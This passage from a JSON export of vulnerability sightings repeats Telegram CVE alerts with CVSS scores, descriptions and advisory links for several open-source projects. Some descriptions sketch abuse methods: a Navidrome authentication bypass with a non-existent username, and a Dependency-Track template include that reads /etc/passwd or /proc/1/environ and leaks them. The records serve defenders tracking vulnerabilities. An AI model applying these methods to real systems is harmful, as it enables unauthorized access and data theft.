CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: REDAXO is a PHP-based CMS. In Redaxo from 5.0.0 through 5.18.2, the rex-api-result parameter is vulnerable to Reflected cross-site scripting (XSS) on the page of AddOns. This vulnerability is fixed in 5.18.3.\n\ud83d\udccf Published: 2025-03-05T15:53:08.813Z\n\ud83d\udccf Modified: 2025-03-05T16:18:31.199Z\n\ud83d\udd17 References:\n1. https://github.com/redaxo/redaxo/security/advisories/GHSA-8366-xmgf-334f", "creation_timestamp": "2025-03-05T16:32:21.000000Z"}, {"uuid": "63160994-e4dd-4ee0-a005-83b3379ced33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:7182", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5260", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd25 CVSS Score: 8.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-02-25T08:07:16.415Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6122\n11. https://access.redhat.com/errata/RHSA-2024:6708\n12. https://access.redhat.com/errata/RHSA-2024:6818\n13. https://access.redhat.com/errata/RHSA-2024:6824\n14. https://access.redhat.com/errata/RHSA-2024:7164\n15. https://access.redhat.com/errata/RHSA-2024:7174\n16. https://access.redhat.com/errata/RHSA-2024:7182\n17. https://access.redhat.com/errata/RHSA-2024:7187\n18. https://access.redhat.com/errata/RHSA-2024:7922\n19. https://access.redhat.com/errata/RHSA-2024:7941\n20. https://access.redhat.com/errata/RHSA-2024:8260\n21. https://access.redhat.com/errata/RHSA-2024:8425\n22. https://access.redhat.com/errata/RHSA-2024:9097\n23. https://access.redhat.com/errata/RHSA-2024:9098\n24. https://access.redhat.com/errata/RHSA-2024:9102\n25. https://access.redhat.com/errata/RHSA-2024:9960\n26. https://access.redhat.com/security/cve/CVE-2024-3727\n27. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-02-25T08:25:24.000000Z"}, {"uuid": "dfd91d2a-f784-4ad4-9ab7-2c5666703f23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6054", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5260", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd25 CVSS Score: 8.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-02-25T08:07:16.415Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6122\n11. https://access.redhat.com/errata/RHSA-2024:6708\n12. https://access.redhat.com/errata/RHSA-2024:6818\n13. https://access.redhat.com/errata/RHSA-2024:6824\n14. https://access.redhat.com/errata/RHSA-2024:7164\n15. https://access.redhat.com/errata/RHSA-2024:7174\n16. https://access.redhat.com/errata/RHSA-2024:7182\n17. https://access.redhat.com/errata/RHSA-2024:7187\n18. https://access.redhat.com/errata/RHSA-2024:7922\n19. https://access.redhat.com/errata/RHSA-2024:7941\n20. https://access.redhat.com/errata/RHSA-2024:8260\n21. https://access.redhat.com/errata/RHSA-2024:8425\n22. https://access.redhat.com/errata/RHSA-2024:9097\n23. https://access.redhat.com/errata/RHSA-2024:9098\n24. https://access.redhat.com/errata/RHSA-2024:9102\n25. https://access.redhat.com/errata/RHSA-2024:9960\n26. https://access.redhat.com/security/cve/CVE-2024-3727\n27. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-02-25T08:25:24.000000Z"}, {"uuid": "472a19c5-5086-4e1b-a8da-ea84e6f5e88d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4960", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5260", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd25 CVSS Score: 8.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-02-25T08:07:16.415Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6122\n11. https://access.redhat.com/errata/RHSA-2024:6708\n12. https://access.redhat.com/errata/RHSA-2024:6818\n13. https://access.redhat.com/errata/RHSA-2024:6824\n14. https://access.redhat.com/errata/RHSA-2024:7164\n15. https://access.redhat.com/errata/RHSA-2024:7174\n16. https://access.redhat.com/errata/RHSA-2024:7182\n17. https://access.redhat.com/errata/RHSA-2024:7187\n18. https://access.redhat.com/errata/RHSA-2024:7922\n19. https://access.redhat.com/errata/RHSA-2024:7941\n20. https://access.redhat.com/errata/RHSA-2024:8260\n21. https://access.redhat.com/errata/RHSA-2024:8425\n22. https://access.redhat.com/errata/RHSA-2024:9097\n23. https://access.redhat.com/errata/RHSA-2024:9098\n24. https://access.redhat.com/errata/RHSA-2024:9102\n25. https://access.redhat.com/errata/RHSA-2024:9960\n26. https://access.redhat.com/security/cve/CVE-2024-3727\n27. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-02-25T08:25:24.000000Z"}, {"uuid": "a13550c4-e0e4-48c8-ba98-30d551d36871", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3GQJ-66QM-25JQ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5362", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27135\n\ud83d\udd25 CVSS Score: 8.9 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P)\n\ud83d\udd39 Description: RAGFlow is an open-source RAG (Retrieval-Augmented Generation) engine. Versions 0.15.1 and prior are vulnerable to SQL injection. The ExeSQL component extracts the SQL statement from the input and sends it directly to the database query. As of time of publication, no patched version is available.\n\ud83d\udccf Published: 2025-02-25T18:16:58.667Z\n\ud83d\udccf Modified: 2025-02-25T18:57:33.672Z\n\ud83d\udd17 References:\n1. https://github.com/infiniflow/ragflow/security/advisories/GHSA-3gqj-66qm-25jq\n2. https://github.com/infiniflow/ragflow/blob/v0.15.1/agent/component/exesql.py\n3. https://swizzky.notion.site/ragflow-exesql-150ca6df7c03806989cefde915cf8e42?pvs=4", "creation_timestamp": "2025-02-25T19:23:55.000000Z"}, {"uuid": "7047e133-c178-4bb8-b506-90567b5ee46b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C3P4-VM8F-386P", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5207", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27112\n\ud83d\udd25 CVSS Score: 6.9 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: Navidrome is an open source web-based music collection server and streamer. Starting in version 0.52.0 and prior to version 0.54.5, in certain Subsonic API endpoints, a flaw in the authentication check process allows an attacker to specify any arbitrary username that does not exist on the system, along with a salted hash of an empty password. Under these conditions, Navidrome treats the request as authenticated, granting access to various Subsonic endpoints without requiring valid credentials. An attacker can use any non-existent username to bypass the authentication system and gain access to various read-only data in Navidrome, such as user playlists. However, any attempt to modify data fails with a \"permission denied\" error due to insufficient permissions, limiting the impact to unauthorized viewing of information. Version 0.54.5 contains a patch for this issue.\n\ud83d\udccf Published: 2025-02-24T18:37:14.221Z\n\ud83d\udccf Modified: 2025-02-24T19:00:44.866Z\n\ud83d\udd17 References:\n1. https://github.com/navidrome/navidrome/security/advisories/GHSA-c3p4-vm8f-386p\n2. https://github.com/navidrome/navidrome/commit/287079a9e409fb6b9708ca384d7daa7b5185c1a0", "creation_timestamp": "2025-02-24T19:22:21.000000Z"}, {"uuid": "7cdaeaaa-7e29-4905-a705-97217442ca2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3QXH-P7JC-5XH6", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5179", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27109\n\ud83d\udd25 CVSS Score: 7.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\ud83d\udd39 Description: solid-js is a declarative, efficient, and flexible JavaScript library for building user interfaces. In affected versions Inserts/JSX expressions inside illegal inlined JSX fragments lacked escaping, allowing user input to be rendered as HTML when put directly inside JSX fragments. This issue has been addressed in version 1.9.4 and all users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-02-21T21:12:58.218Z\n\ud83d\udccf Modified: 2025-02-24T17:05:00.409Z\n\ud83d\udd17 References:\n1. https://github.com/solidjs/solid/security/advisories/GHSA-3qxh-p7jc-5xh6\n2. https://github.com/solidjs/solid/commit/b93956f28ed75469af6976a98728e313d0edd236", "creation_timestamp": "2025-02-24T17:21:42.000000Z"}, {"uuid": "a89e5a36-f4a3-4c21-94ac-7fc872907566", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8425", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5260", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd25 CVSS Score: 8.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-02-25T08:07:16.415Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6122\n11. https://access.redhat.com/errata/RHSA-2024:6708\n12. https://access.redhat.com/errata/RHSA-2024:6818\n13. https://access.redhat.com/errata/RHSA-2024:6824\n14. https://access.redhat.com/errata/RHSA-2024:7164\n15. https://access.redhat.com/errata/RHSA-2024:7174\n16. https://access.redhat.com/errata/RHSA-2024:7182\n17. https://access.redhat.com/errata/RHSA-2024:7187\n18. https://access.redhat.com/errata/RHSA-2024:7922\n19. https://access.redhat.com/errata/RHSA-2024:7941\n20. https://access.redhat.com/errata/RHSA-2024:8260\n21. https://access.redhat.com/errata/RHSA-2024:8425\n22. https://access.redhat.com/errata/RHSA-2024:9097\n23. https://access.redhat.com/errata/RHSA-2024:9098\n24. https://access.redhat.com/errata/RHSA-2024:9102\n25. https://access.redhat.com/errata/RHSA-2024:9960\n26. https://access.redhat.com/security/cve/CVE-2024-3727\n27. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-02-25T08:25:24.000000Z"}, {"uuid": "aa010bdc-e659-477d-9320-e75f5c5e3207", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6818", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5260", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd25 CVSS Score: 8.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-02-25T08:07:16.415Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6122\n11. https://access.redhat.com/errata/RHSA-2024:6708\n12. https://access.redhat.com/errata/RHSA-2024:6818\n13. https://access.redhat.com/errata/RHSA-2024:6824\n14. https://access.redhat.com/errata/RHSA-2024:7164\n15. https://access.redhat.com/errata/RHSA-2024:7174\n16. https://access.redhat.com/errata/RHSA-2024:7182\n17. https://access.redhat.com/errata/RHSA-2024:7187\n18. https://access.redhat.com/errata/RHSA-2024:7922\n19. https://access.redhat.com/errata/RHSA-2024:7941\n20. https://access.redhat.com/errata/RHSA-2024:8260\n21. https://access.redhat.com/errata/RHSA-2024:8425\n22. https://access.redhat.com/errata/RHSA-2024:9097\n23. https://access.redhat.com/errata/RHSA-2024:9098\n24. https://access.redhat.com/errata/RHSA-2024:9102\n25. https://access.redhat.com/errata/RHSA-2024:9960\n26. https://access.redhat.com/security/cve/CVE-2024-3727\n27. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-02-25T08:25:24.000000Z"}, {"uuid": "41f82f87-8a6e-46dd-9251-f2bf2b5cc696", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9102", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5260", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd25 CVSS Score: 8.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-02-25T08:07:16.415Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6122\n11. https://access.redhat.com/errata/RHSA-2024:6708\n12. https://access.redhat.com/errata/RHSA-2024:6818\n13. https://access.redhat.com/errata/RHSA-2024:6824\n14. https://access.redhat.com/errata/RHSA-2024:7164\n15. https://access.redhat.com/errata/RHSA-2024:7174\n16. https://access.redhat.com/errata/RHSA-2024:7182\n17. https://access.redhat.com/errata/RHSA-2024:7187\n18. https://access.redhat.com/errata/RHSA-2024:7922\n19. https://access.redhat.com/errata/RHSA-2024:7941\n20. https://access.redhat.com/errata/RHSA-2024:8260\n21. https://access.redhat.com/errata/RHSA-2024:8425\n22. https://access.redhat.com/errata/RHSA-2024:9097\n23. https://access.redhat.com/errata/RHSA-2024:9098\n24. https://access.redhat.com/errata/RHSA-2024:9102\n25. https://access.redhat.com/errata/RHSA-2024:9960\n26. https://access.redhat.com/security/cve/CVE-2024-3727\n27. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-02-25T08:25:24.000000Z"}, {"uuid": "211d005f-71b9-4c76-a305-85d436e0f34c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8260", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5260", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd25 CVSS Score: 8.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-02-25T08:07:16.415Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6122\n11. https://access.redhat.com/errata/RHSA-2024:6708\n12. https://access.redhat.com/errata/RHSA-2024:6818\n13. https://access.redhat.com/errata/RHSA-2024:6824\n14. https://access.redhat.com/errata/RHSA-2024:7164\n15. https://access.redhat.com/errata/RHSA-2024:7174\n16. https://access.redhat.com/errata/RHSA-2024:7182\n17. https://access.redhat.com/errata/RHSA-2024:7187\n18. https://access.redhat.com/errata/RHSA-2024:7922\n19. https://access.redhat.com/errata/RHSA-2024:7941\n20. https://access.redhat.com/errata/RHSA-2024:8260\n21. https://access.redhat.com/errata/RHSA-2024:8425\n22. https://access.redhat.com/errata/RHSA-2024:9097\n23. https://access.redhat.com/errata/RHSA-2024:9098\n24. https://access.redhat.com/errata/RHSA-2024:9102\n25. https://access.redhat.com/errata/RHSA-2024:9960\n26. https://access.redhat.com/security/cve/CVE-2024-3727\n27. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-02-25T08:25:24.000000Z"}, {"uuid": "1e96ead4-fc5e-404d-a400-d4a4208fa2b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XJ79-W799-QJCP", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5208", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27133\n\ud83d\udd25 CVSS Score: 9.4 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H)\n\ud83d\udd39 Description: WeGIA is a Web manager for charitable institutions. A SQL Injection vulnerability was discovered in the WeGIA application prior to version 3.2.15 at the `adicionar_tipo_exame.php` endpoint. This vulnerability allows an authorized attacker to execute arbitrary SQL queries, allowing access to sensitive information. Version 3.2.15 contains a patch for the issue.\n\ud83d\udccf Published: 2025-02-24T18:43:16.403Z\n\ud83d\udccf Modified: 2025-02-24T18:58:30.181Z\n\ud83d\udd17 References:\n1. https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xj79-w799-qjcp\n2. https://github.com/LabRedesCefetRJ/WeGIA/commit/619ead748e18e685459c6dc3c226e621b9ff5403", "creation_timestamp": "2025-02-24T19:22:25.000000Z"}, {"uuid": "d719e83f-01eb-4d39-9170-31547f05e8d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7MPF-6GG2-2FJP", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14112", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46552\n\ud83d\udd25 CVSS Score: 6.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: KHC-INVITATION-AUTOMATION is a GitHub automation script that automatically invites followers of a bot account to join your organization. In some commits on version 1.2, a vulnerability was identified where user data, including email addresses and Discord usernames, were exposed in API responses without proper access controls. This allowed unauthorized users to access sensitive user information by directly calling specific endpoints. This issue has been patched in a later commit on version 1.2.\n\ud83d\udccf Published: 2025-04-29T22:13:37.746Z\n\ud83d\udccf Modified: 2025-04-30T17:40:07.561Z\n\ud83d\udd17 References:\n1. https://github.com/Krypto-Hashers-Community/KHC-INVITATION-AUTOMATION/security/advisories/GHSA-7mpf-6gg2-2fjp\n2. https://github.com/Krypto-Hashers-Community/KHC-INVITATION-AUTOMATION/commit/bc908a4ef538b24d4543ae95a413be6afa308bf5", "creation_timestamp": "2025-04-30T18:14:21.000000Z"}, {"uuid": "e2f774ab-3b38-49b2-9fd8-d9f9a955ac6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GWVM-VRP4-4PP5", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5222", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-28444\n\ud83d\udd25 CVSS Score: 9.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L)\n\ud83d\udd39 Description: angular-server-side-configuration helps configure an angular application at runtime on the server or in a docker container via environment variables. angular-server-side-configuration detects used environment variables in TypeScript (.ts) files during build time of an Angular CLI project. The detected environment variables are written to a ngssc.json file in the output directory.\nDuring deployment of an Angular based app, the environment variables based on the variables from ngssc.json are inserted into the apps index.html (or defined index file). With version 15.0.0 the environment variable detection was widened to the entire project, relative to the angular.json file from the Angular CLI. In a monorepo setup, this could lead to environment variables intended for a backend/service to be detected and written to the ngssc.json, which would then be populated and exposed via index.html. This has NO IMPACT, in a plain Angular project that has no backend component. This vulnerability has been mitigated in version 15.1.0, by adding an option `searchPattern` which restricts the detection file range by default. As a workaround, manually edit or create ngssc.json or run script after ngssc.json generation.\n\n\ud83d\udccf Published: 2023-03-24T19:58:59.998Z\n\ud83d\udccf Modified: 2025-02-24T19:37:02.320Z\n\ud83d\udd17 References:\n1. https://github.com/kyubisation/angular-server-side-configuration/security/advisories/GHSA-gwvm-vrp4-4pp5\n2. https://github.com/kyubisation/angular-server-side-configuration/commit/d701f51260637a84ede278e248934e0437a7ff86\n3. https://github.com/kyubisation/angular-server-side-configuration/releases/tag/v15.1.0", "creation_timestamp": "2025-02-24T20:22:29.000000Z"}, {"uuid": "42920696-028d-4f2a-a747-966c477ddaea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9582-88HR-54W3", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5227", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27137\n\ud83d\udd25 CVSS Score: 4.4 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: Dependency-Track is a component analysis platform that allows organizations to identify and reduce risk in the software supply chain. Dependency-Track allows users with the `SYSTEM_CONFIGURATION` permission to customize notification templates. Templates are evaluated using the Pebble template engine. Pebble supports an `include` tag, which allows template authors to include the content of arbitrary files upon evaluation. Prior to version 4.12.6, users of Dependency-Track with the `SYSTEM_CONFIGURATION` permission can abuse the `include` tag by crafting notification templates that `include` sensitive local files, such as `/etc/passwd` or `/proc/1/environ`. By configuring such a template for a notification rule (aka \"Alert\"), and having it send notifications to a destination controlled by the actor, sensitive information may be leaked. The issue has been fixed in Dependency-Track 4.12.6. In fixed versions, the `include` tag can no longer be used. Usage of the tag will cause template evaluation to fail. As a workaround, avoid assigning the `SYSTEM_CONFIGURATION` permission to untrusted users. The `SYSTEM_CONFIGURATION` permission per default is only granted to members of the `Administrators` team. Assigning this permission to non-administrative users or teams is a security risk in itself, and highly discouraged.\n\ud83d\udccf Published: 2025-02-24T20:59:50.974Z\n\ud83d\udccf Modified: 2025-02-24T20:59:50.974Z\n\ud83d\udd17 References:\n1. https://github.com/DependencyTrack/dependency-track/security/advisories/GHSA-9582-88hr-54w3\n2. https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-p75g-cxfj-7wrx\n3. https://github.com/PebbleTemplates/pebble/issues/680\n4. https://github.com/DependencyTrack/dependency-track/pull/4684\n5. https://github.com/DependencyTrack/dependency-track/pull/4685\n6. https://pebbletemplates.io/wiki/tag/include", "creation_timestamp": "2025-02-24T21:25:44.000000Z"}, {"uuid": "0bd66666-27e1-4d97-9619-2d88ab270870", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P75G-CXFJ-7WRX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5227", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27137\n\ud83d\udd25 CVSS Score: 4.4 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: 